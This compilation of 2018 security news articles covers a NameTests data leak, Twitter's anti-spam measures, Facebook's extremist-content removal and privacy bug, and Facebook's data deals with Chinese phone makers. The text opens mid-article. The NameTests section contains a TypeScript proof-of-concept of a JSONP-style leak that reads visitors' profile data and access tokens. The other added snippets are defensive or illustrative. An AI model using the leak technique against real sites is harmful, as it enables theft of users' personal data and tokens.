The data loaded from Nametests.com was wrapped in a JavaScript file, which meant it could be accessed by other websites that requested it.

“In a normal situation, other websites would not be able to access this information. Web browsers have mechanisms in place to prevent that from happening.” the researcher wrote in a blog post.

“Since NameTests displayed their user’s personal data in JavaScript file, virtually any website could access it when they would request it,”

The expert set up a website that fetched data about the visitor from the Nametests.com website. In turn, Nametests.com provided an access token that could also be used to gain access to the visitor’s posts, photos and friends, depending on the permissions granted.

“NameTests would also provide a secret key called an access token, which, depending on the permissions granted, could be used to gain access to a visitor’s posts, photos and friends. It would only take one visit to our website to gain access to someone’s personal information for up to two months.” De Ceukelaire added.
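What De Ceukelaire describes is essentially a JSONP-style leak: because the personal data came back inside an executable script rather than as a plain data response, the browser's same-origin policy did not stop a third-party page from reading it once the script ran. The TypeScript sketch below is a purely hypothetical illustration of that class of attack; the endpoint URL, the callback parameter and the response fields are assumptions made for the example, not the actual NameTests implementation.

    // Hypothetical illustration of a JSONP-style data leak (not NameTests' real code).
    // Assumption: the vulnerable endpoint returns something like
    //   userCallback({"name": "...", "email": "...", "token": "..."});
    // and relies only on the visitor's cookies to personalise the response.

    interface LeakedProfile {
      name?: string;
      email?: string;
      token?: string; // the access token mentioned in the write-up
    }

    // The attacker's page defines the callback that the wrapped response will invoke.
    (window as any).userCallback = (data: LeakedProfile): void => {
      // Because the response is an executable script, the same-origin policy
      // does not prevent this page from reading the data it carries.
      console.log('Leaked profile data:', data);
      // A real attacker would now forward `data` to a server they control.
    };

    // Loading the endpoint via a <script> tag makes the browser attach the
    // visitor's cookies, so the response is personalised to the victim.
    const script = document.createElement('script');
    script.src = 'https://nametests.example/appconfig_user?callback=userCallback'; // hypothetical URL
    document.body.appendChild(script);

The standard defences against this class of leak are to stop wrapping personalised data in executable scripts, to validate the request's origin, and to require a secret the embedding page cannot guess.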

The expert also published a video PoC showing how NameTests continued to reveal a visitor’s identity even after the app had been deleted. The user information remained available through the website until the user manually deleted the cookies stored on their device.

The issue was reported to Facebook’s Data Abuse Bounty Program on April 22, and a fix was rolled out on June 25.

According to Facebook, the bug could “have affected Facebook information people shared with nametests.com.” In response to the incident, the tech giant revoked the access tokens of everyone on Facebook who had signed up to use the app.

“It was reported by Inti De Ceukelaire and we worked with the app’s developer — Social Sweethearts — to address the website vulnerability he identified which could have affected Facebook information people shared with nametests.com.” reads a post published by Facebook.

“To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it.”
Facebook awarded the expert $8,000 instead of the original $4,000 bounty because he chose to donate it to charity.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher concluded.


Twitter shared details about its strategy for fighting spam and bots
29.6.2018 securityaffairs 
Social 

Twitter provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platforms are a privileged tool for psyops and malicious campaigns; for this reason, Twitter rolled out new features to detect and prevent abuse.

Threat actors make heavy use of bots to spread propaganda and malicious links, and social media platforms are investing significant effort in mitigating these threats.

Twitter claims that in May it challenged more than 9.9 million potentially automated accounts used for malicious activity every week, a significant increase from 6.4 million in December 2017.
The social media platform said the new measures drastically reduced spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018, most of which were shut down within a week, or even within hours, of being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bot activity by detecting synchronized operations conducted by multiple accounts.
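Twitter’s post does not describe the detection logic itself, but the general idea can be illustrated with a simple heuristic: if many distinct accounts perform the same action (for example tweeting the same link or following the same profile) inside the same short time window, the group is likely coordinated. The TypeScript sketch below is only an illustrative approximation under that assumption; the data model, thresholds and function names are invented for the example and are not Twitter’s actual system.

    // Illustrative heuristic only: flag groups of accounts acting in sync.
    interface AccountAction {
      accountId: string;
      contentKey: string; // e.g. a normalised tweet text or a followed account ID
      timestamp: number;  // Unix time in seconds
    }

    function flagSynchronizedAccounts(
      actions: AccountAction[],
      bucketSeconds = 60,  // assumed one-minute buckets
      minGroupSize = 20    // assumed threshold for "coordinated"
    ): Set<string> {
      // Group actions by content and coarse time bucket.
      const groups = new Map<string, Set<string>>();
      for (const a of actions) {
        const bucket = Math.floor(a.timestamp / bucketSeconds);
        const key = `${a.contentKey}#${bucket}`;
        const members = groups.get(key) ?? new Set<string>();
        members.add(a.accountId);
        groups.set(key, members);
      }

      // Any group with enough distinct accounts is flagged for review.
      const flagged = new Set<string>();
      for (const members of groups.values()) {
        if (members.size >= minGroupSize) {
          for (const id of members) flagged.add(id);
        }
      }
      return flagged;
    }

Accounts surfaced by heuristics of this kind could then be placed in the read-only state described below until they pass a challenge.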

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,” Twitter added.

The company also introduced measures to audit existing accounts and control the creation of new ones.

Twitter is increasing checks on the sign-up process to make it difficult to register spam accounts, for example by requiring more interaction from the user, such as the confirmation of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is also investing in behavioral detection: its engineers are working on measures that, once suspicious activity is detected, challenge the account owner with actions that require their interaction.


Twitter Unveils New Processes for Fighting Spam, Bots
29.6.2018 securityweek 
Social

Twitter this week shared some details on new processes designed to prevent malicious automation and spam, along with data on the positive impact of the measures implemented in recent months.

Spam and bots are highly problematic on Twitter, but the social media giant says it has rolled out some new systems that have helped its fight against these issues. The company claims that last month it challenged more than 9.9 million potentially spammy or automated accounts every week, up from 6.4 million in December last year.

Twitter says it now removes 214% more spam accounts compared to 2017. It also claims that recent changes have led to a significant drop in spam reports received from users, from 25,000 daily reports in March to 17,000 in May.

The company also reported suspending over 142,000 apps in the first quarter of 2018, more than half of which were shut down within a week or even within hours after being registered.

One measure implemented recently by Twitter involves updating account metrics in near-real time. Spam accounts and bots often follow other accounts in bulk and this type of behavior should quickly be caught by Twitter’s systems. However, the company has now also decided to remove follower and engagement counts from suspicious accounts that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,” Twitter’s Yoel Roth and Del Harvey said in a blog post.

The company has also made some changes to its sign-up process to make it more difficult to register spam accounts. This includes requiring new accounts to confirm an email address or phone number.

Existing accounts are also being audited to ensure that they weren’t created using automation.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” Roth and Harvey explained. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

Finally, Twitter says it has expanded its malicious behavior detection systems with tests that can involve solving a reCAPTCHA or responding to a password reset request. Complex cases are passed on to Twitter employees for review.

Twitter also announced this week that users can configure a USB security key as part of the two-factor authentication (2FA) process.

On June 21, Twitter revealed that it entered an agreement to acquire Smyte, which specializes in safety, spam and security issues. By acquiring the company, the social media giant hopes to “improve the health of conversation on Twitter.”


Facebook Claims 99% of Extremist Content Removed Without Users' Help
15.6.2018 securityweek
Social

Facebook claims growing success in fight against extremist content

At this week's International Homeland Security Forum (IHSF) hosted in Jerusalem by Israel’s minister of public security, Gilad Erdan, Facebook claimed growing success in its battle to remove extremist content from the network.

Dr. Erin Marie Saltman, Facebook counterterrorism policy lead for EMEA, said, "On Terrorism content, 99% of terrorist content from ISIS and al-Qaida we take down ourselves, without a single user flagging it to us. In the first quarter of 2018 we took down 1.9 million pieces of this type of terrorist content."

This was achieved by a combination of Facebook staff and machine learning algorithms. "Focusing our machine learning tools on the most egregious terrorist content we are able to speak to scale and speed of efforts much more openly. But human review and operations is also always needed."

However, the implication that Facebook is winning the war against extremism is countered by a report ('Spiders of the Caliphate: Mapping the Islamic State's Global Support Network on Facebook' PDF) published in May 2018 by the Counter Extremism Project (CEP).

CEP was launched in 2014 by former U.S. government officials, including former Homeland Security adviser Frances Townsend, former Connecticut Senator Joseph Lieberman, and Mark Wallace, a former U.S. Ambassador to the United Nations.

Its report mapped 1,000 Facebook profiles explicitly supporting IS between October 2017 and March 2018. Using the open-source network analysis and visualization program Gephi, it found that the profiles' visible 'friends' expanded the dataset into a network of 1,000 nodes connected by 5,347 edges. Facebook's friending mechanism is particularly criticized as a means by which IS accounts find new targets to recruit.
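For readers unfamiliar with the terminology, the 'nodes' here are the IS-supporting profiles and the 'edges' are the visible friendship links between them. The short TypeScript sketch below shows, purely as an illustration, how such a friendship dataset reduces to node and edge counts; CEP used the Gephi desktop tool rather than code, and the data structures here are invented for the example.

    // Illustrative only: count the nodes and edges of a friendship network.
    interface FriendLink {
      fromProfile: string;
      toProfile: string;
    }

    function summarizeNetwork(links: FriendLink[]): { nodes: number; edges: number } {
      const nodes = new Set<string>();
      const edges = new Set<string>();
      for (const { fromProfile, toProfile } of links) {
        nodes.add(fromProfile);
        nodes.add(toProfile);
        // Friendships are undirected, so store each pair in a canonical order.
        edges.add([fromProfile, toProfile].sort().join('--'));
      }
      return { nodes: nodes.size, edges: edges.size };
    }

    // A dataset of the size CEP describes would summarise to roughly
    // { nodes: 1000, edges: 5347 }.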

The report actually refers to the 99% claim, implying that Saltman's claim is not a new development superseding the findings of CEP: "Given IS's ongoing presence on the platform, it is clear that Facebook's current content moderation systems are inadequate, contrary to the company's public statements. Facebook has said that they remove 99% of IS and Al Qaeda content using automated systems..."

In fact, CEP fears that Facebook relies too heavily on its algorithms for finding and removing terrorist content. "This reliance on automated systems means IS supporters' profiles often go unremoved by Facebook and can remain on the platform for extended periods of time." It gives the example of a video from the IS Amaq news agency that was posted in September 2016 and remained available when the report was written in April 2018.

"The video depicts combat footage from the Battle of Mosul and shows how IS produced a variety of weapon systems including car bombs and rocket launchers," notes the report.

Another example describes an ISIS supporter friending a non-Muslim and then gradually radicalizing him during the six-month period. "ID 551 played a clear role in radicalizing ID 548 and recruiting him as an IS supporter," says the report. "Facebook was the platform that facilitated the process, and it also functioned as an IS news source for him. Furthermore, given his connections with existing IS networks on Facebook, the moment that ID 548 wishes to become more than an online supporter he has the necessary contacts available to him. These are individuals who can assist with traveling to fight for the group or staging an attack in America. This case provides a detailed insight into the scope to which IS has taken advantage of Facebook's half-measures to combating extremism online."

This is not a simple problem. Taking down suspect terrorist content that is posted and used legitimately is a direct infringement of U.S. users' First Amendment rights. Dr Saltman described this issue at the IHSF conference. "We see," she said, "that pieces of terrorist content and imagery are used by legitimate voices as well; activists and civil society voices who share the content to condemn it, mainstream media using imagery to discuss it within news segments; so, we need specialized operations teams with local language knowledge to understand the nuance of how some of this content is shared."

To help avoid freedom of speech issues, Facebook has made its enforcement process more transparent. "I am pleased to say," said Saltman, "that just last month we made the choice to proactively be more transparent about our policies, releasing much more information about how we define our global policies through our Comprehensive Community Standards. These standards cover everything from keeping safe online to how we define dangerous organizations and terrorism."

At the same time, appealing removal decisions is made easier and adjudicated by a human. This can be problematic. According to a January 2018 report in the Telegraph, an IS supporter in the UK who shared large amounts of IS propaganda had his account reactivated nine times by Facebook after he complained to the moderators that Facebook was stifling his free speech.

Where clearly illegal material is visible, Facebook cooperates proactively with law enforcement. Waheba Issa Dais, a 45-year-old Wisconsin mother of two, is in federal custody after being charged on Wednesday this week with providing 'material support or resources to a foreign terrorist organization.'

The Milwaukee Journal Sentinel reports, "The investigation appears to have started in January after Facebook security told the FBI that there was a 'Wisconsin-based user posting detailed instructions on how to make explosive vest bombs in support of ISIS,' the affidavit states. The person behind the Facebook posts, who the FBI said they determined was Dais, 'also appeared to be engaged in detailed question and answer sessions discussing substances used to make bombs'."

Ricin is mentioned. It would be easy enough for a word like 'ricin' to activate an alert. It is in the less obvious extremist content that machine learning algorithms need to be used. But machine learning is still a technology with great promise and partial delivery. "The real message is that Facebook has made it more difficult for ISIS and Al-Qaida to use their platform for recruiting," Ron Gula, president and co-founder of Gula Tech Adventures told SecurityWeek.

"Machine learning is great at recognizing patterns. Unfortunately, if the terrorists change their content and recruiting methods, they may still be able to leverage Facebook. This type of detection could turn into a cat and mouse game where terror organizations continuously change their tactics, causing Facebook to constantly have to update their rules and intelligence about what should be filtered."

The extremists won't make it easy. "They have become very good at putting a reasonable 'face' on much of their online recruiting material," explains John Dickson, Principal at the Denim Group. "Once they have someone interested is when they fully expose their intent. Given this situation, I’m not sure how [the algorithms] don’t create a ton of false positives and start taking down legitimate Islamic content."

Nearly every security activity creates false positives. "I suspect this will be no different," he continued. "Machine learning or more specifically supervised learning likely will help aid security analysts attempting to distinguish between legitimate jihadist recruiting material and generic Islamic content. But it will still need a human to make the final decisions – and that human is likely to be biased by the American attitude towards freedom of speech."

In the final analysis, Facebook is caught between competing demands: a very successful business model built on making 'friending' and posting easy; the First Amendment protecting free speech; and moral and legal demands to find and exclude disguised extremist needles hidden in a very large haystack of 2.2 billion monthly active Facebook users.


Facebook Admits Privacy Settings 'Bug' Affecting 14 Million Users
8.6.2018 securityweek
Social

Facebook acknowledged Thursday a software glitch that changed the settings of some 14 million users, potentially making some posts public even if they were intended to be private.

The news marked the latest in a series of privacy embarrassments for the world's biggest social network, which has faced a firestorm over the hijacking of personal data on tens of millions of users and more recently for disclosures on data-sharing deals with smartphone makers.

Erin Egan, Facebook's chief privacy officer, said in a statement that the company recently "found a bug that automatically suggested posting publicly when some people were creating their Facebook posts."

Facebook said this affected users posting between May 18 and May 27 as it was implementing a new way to share some items such as photos.

That left the default or suggested method of sharing as public instead of only for specific users or friends.
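Facebook's statements do not go into the technical root cause, but the behaviour described (a new sharing feature whose suggested audience became public instead of the user's previous choice) matches a common class of regression in which a new code path stops reusing the audience the user last selected. The TypeScript sketch below is purely hypothetical and only illustrates that failure mode; the type names, fields and logic are invented and do not represent Facebook's actual code.

    // Hypothetical illustration of a default-audience regression.
    type Audience = 'PUBLIC' | 'FRIENDS' | 'ONLY_ME' | 'CUSTOM';

    interface ComposerState {
      lastUsedAudience?: Audience; // what the suggestion should normally reuse
      featuredItemsFlow?: boolean; // stand-in for the new sharing feature
    }

    // Buggy version: the new feature's code path ignores the user's
    // previous choice and silently suggests PUBLIC.
    function suggestAudienceBuggy(state: ComposerState): Audience {
      if (state.featuredItemsFlow) {
        return 'PUBLIC'; // regression: wrong default for affected users
      }
      return state.lastUsedAudience ?? 'FRIENDS';
    }

    // Fixed version: always prefer the audience the user chose last time.
    function suggestAudienceFixed(state: ComposerState): Audience {
      return state.lastUsedAudience ?? 'FRIENDS';
    }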

Facebook said it corrected the problem on May 22 but was unable to change all the posts, so is now notifying affected users.

"Starting today we are letting everyone affected know and asking them to review any posts they made during that time," Egan said.

"To be clear, this bug did not impact anything people had posted before -- and they could still choose their audience just as they always have. We'd like to apologize for this mistake."

Facebook confirmed earlier this week that China-based Huawei -- which has been banned by the US military and is a lightning rod for cyberespionage concerns -- was among device makers authorized to see user data in agreements that had been in place for years.

Facebook has claimed the agreements with some 60 device makers dating from a decade ago were designed to help the social media giant get more services into the mobile ecosystem.

Nonetheless, lawmakers expressed outrage that Chinese firms were given access to user data at a time when officials were trying to block their access to the US market over national security concerns.

The revelations come weeks after chief executive Mark Zuckerberg was grilled in Congress about the hijacking of personal data on some 87 million Facebook users by Cambridge Analytica, a consultancy working on Donald Trump's 2016 presidential campaign.


Facebook confirms privacy settings glitch in a new feature exposed private posts of 14 Million users
8.6.2018 securityaffairs
Social

Facebook admitted that a bug affecting its platform caused the change of the settings of some 14 million users, potentially exposing their private posts to the public.
This is the worst period in the history of the social network giant, which was also recently involved in the Cambridge Analytica privacy scandal that affected at least 87 million users.

“We recently found a bug that automatically suggested posting publicly when some people were creating their Facebook posts. We have fixed this issue and starting today we are letting everyone affected know and asking them to review any posts they made during that time,” said Erin Egan, Facebook’s chief privacy officer.

“To be clear, this bug did not impact anything people had posted before—and they could still choose their audience just as they always have. We’d like to apologize for this mistake.”

According to Facebook, the glitch affected users who published posts between May 18 and May 27, a period during which it was implementing a new way to share items such as photos and videos.

Evidently, something went wrong, and the default or suggested audience for new posts was set to public instead of the user's usual setting.

The social network giant confirmed it corrected the bug on May 22, but it was unable to change the visibility of all the affected posts.

The company is now notifying affected users and apologizing for the technical issue.

This is only the latest embarrassing case involving Facebook in recent weeks. In April, researchers from Princeton reported that Facebook's authentication feature "Login With Facebook" could be exploited to collect user information that was supposed to be private.

Earlier this week, Facebook confirmed that its APIs granted more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung, access to its users' data so that they could implement Facebook messaging functions.

The Chinese vendor Huawei was one of the device makers authorized to use the API. In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to the unacceptable security risk they pose.

Facebook highlighted that the agreements were signed ten years ago and that it acted to prevent any abuse of the API.


Facebook Deals With Chinese Firm Draw Ire From U.S. Lawmakers
7.6.2018 securityweek
Social

Facebook drew fresh criticism from US lawmakers following revelations that it allowed Chinese smartphone makers, including one deemed a national security threat, access to user data.

The world's largest social network confirmed late Tuesday that China-based Huawei -- which has been banned by the US military and is a lightning rod for cyberespionage concerns -- was among device makers authorized to see user data.

Facebook has claimed the agreements with some 60 device makers dating from a decade ago were designed to help the social media giant get more services into the mobile ecosystem.

Nonetheless, lawmakers expressed outrage that Chinese firms were given access to user data at a time when officials were trying to block their access to the US market over national security concerns.

Senator Ed Markey said Facebook's chief executive has some more explaining to do following these revelations.

"Mark Zuckerberg needs to return to Congress and testify why @facebook shared Americans' private information with questionable Chinese companies," the Massachusetts Democrat said on Twitter.

"Our privacy and national security cannot be the cost of doing business."

Other lawmakers zeroed in on the concerns about Huawei's ties to the Chinese government, even though the company has denied the allegations.

"This could be a very big problem," tweeted Senator Marco Rubio, a Florida Republican.

"If @Facebook granted Huawei special access to social data of Americans this might as well have given it directly to the government of #China."

Representative Debbie Dingell called the latest news on Huawei "outrageous" and urged a new congressional probe.

"Why does Huawei, a company that our intelligence community said is a national security threat, have access to our personal information?" said Dingell, a Michigan Democrat, on Twitter.

"With over 184 million daily Facebook users in US & Canada, the potential impact on our privacy & national security is huge."

'Approved experiences'

Facebook, which has been blocked in China since 2009, also had data-access deals with Chinese companies Lenovo, OPPO and TCL, according to the company, which had similar arrangements with dozens of other device makers.

Huawei, which has claimed national security fears are unfounded, said in an emailed statement its access was the same as other device makers.

"Like all leading smartphone providers, Huawei worked with Facebook to make Facebook's service more convenient for users. Huawei has never collected or stored any Facebook user data."

The revelations come weeks after Zuckerberg was grilled in Congress about the hijacking of personal data on some 87 million Facebook users by Cambridge Analytica, a consultancy working on Donald Trump's 2016 campaign.

Facebook said its contracts with phone makers placed tight limits on what could be done with data, and "approved experiences" were reviewed by engineers and managers before being deployed, according to the social network.

Any data obtained by Huawei "was stored on the device, not on Huawei's servers," according to Facebook mobile partnerships chief Francisco Varela.

Facebook said it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

It has argued the data-sharing with smartphone makers was different from the leak of data to Cambridge Analytica, which obtained private user data from a personality quiz designed by an academic researcher who violated Facebook's rules.

Facebook is winding up the interface arrangements with device makers as the company's smartphone apps now dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The news comes following US sanctions on another Chinese smartphone maker, ZTE -- which was not on the Facebook list -- for violating export restrictions to Iran.

The ZTE sanctions limiting access to US components could bankrupt the manufacturer, but Trump has said he is willing to help rescue the firm, despite objections from US lawmakers.


Germany's Continental Bans WhatsApp From Work Phones
6.6.2018 securityweek
Social

German car parts supplier Continental on Tuesday said it was banning the use of WhatsApp and Snapchat on work-issued mobile phones "with immediate effect" because of data protection concerns.

The company said such social media apps had "deficiencies" that made it difficult to comply with tough new EU data protection legislation, especially their insistence on having access to a user's contact list.

"Continental is prohibiting its employees from using social media apps like WhatsApp and Snapchat in its global company network, effective immediately," the firm said in a statement.

Some 36,000 employees would be affected by the move, a Continental spokesman told AFP.

The company, one of the world's leading makers of car parts, has over 240,000 staff globally.

A key principle of the European Union's new general data protection regulation (GDPR), which came into force on May 25, is that individuals must explicitly grant permission for their data to be used.

But Continental said that by demanding full access to address books, WhatsApp for example had shifted the burden onto the user, essentially expecting them to contact everyone in their phone to let them know their data was being shared.

"We think it is unacceptable to transfer to users the responsibility of complying with data protection laws," said Continental's CEO Elmar Degenhart.

The Hanover-based firm said it stood ready to reverse its decision once the service providers "change the basic settings to ensure that their apps comply with data-protection regulations by default".

The issue of how personal information is used and shared online was given fresh urgency after Facebook earlier this year admitted to a massive privacy breach that allowed a political consultancy linked to US President Donald Trump's 2016 campaign to harvest the data of up to 87 million users.


Facebook Says Chinese Phone Makers Got Access to Data
6.6.2018 securityweek
Social

Facebook on Tuesday confirmed that a Chinese phone maker deemed a national security threat by the US was among companies given access to data on users.

Huawei was able to access Facebook data to get the leading social network's applications to perform on smartphones, according to the California-based company.

"Facebook along with many other US tech companies have worked with them and other Chinese manufacturers to integrate their services onto these phones," Facebook mobile partnerships leader Francisco Varela said in a released statement.

"Given the interest from Congress, we wanted to make clear that all the information from these integrations with Huawei was stored on the device, not on Huawei's servers."

Facebook also had data access deals with Lenovo, OPPO and TCL of China, according to Varela.

"Facebook's integrations with Huawei, Lenovo, OPPO and TCL were controlled from the get go," Varela said.

Huawei has long disputed any links to the Chinese government, while noting that its infrastructure and computing products are used in 170 countries.

"Concerns about Huawei aren't new," US Senator Mark Warner, vice chairman of the senate select committee on intelligence, said Tuesday in a released statement.

"I look forward to learning more about how Facebook ensured that information about their users was not sent to Chinese servers."

Facebook said that it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

Before now-ubiquitous apps standardized the social media experience on smartphones, some 60 device makers like Amazon, Apple, Blackberry, HTC, Microsoft and Samsung worked with Facebook to adapt interfaces for the Facebook website to their own phones, the company said.

Facebook said it is winding up the interface arrangements with device makers as the company's smartphone apps dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The social media leader said it "disagreed" with the conclusions of a New York Times report that found that the device makers could access information on Facebook users' friends without their explicit consent.

Facebook enabled device makers to interface with it at a time when it was building its service and they were developing new smartphone and social media technology.

But the report raised concerns that massive databases on users and their friends -- including personal data and photographs -- could be in the hands of device makers.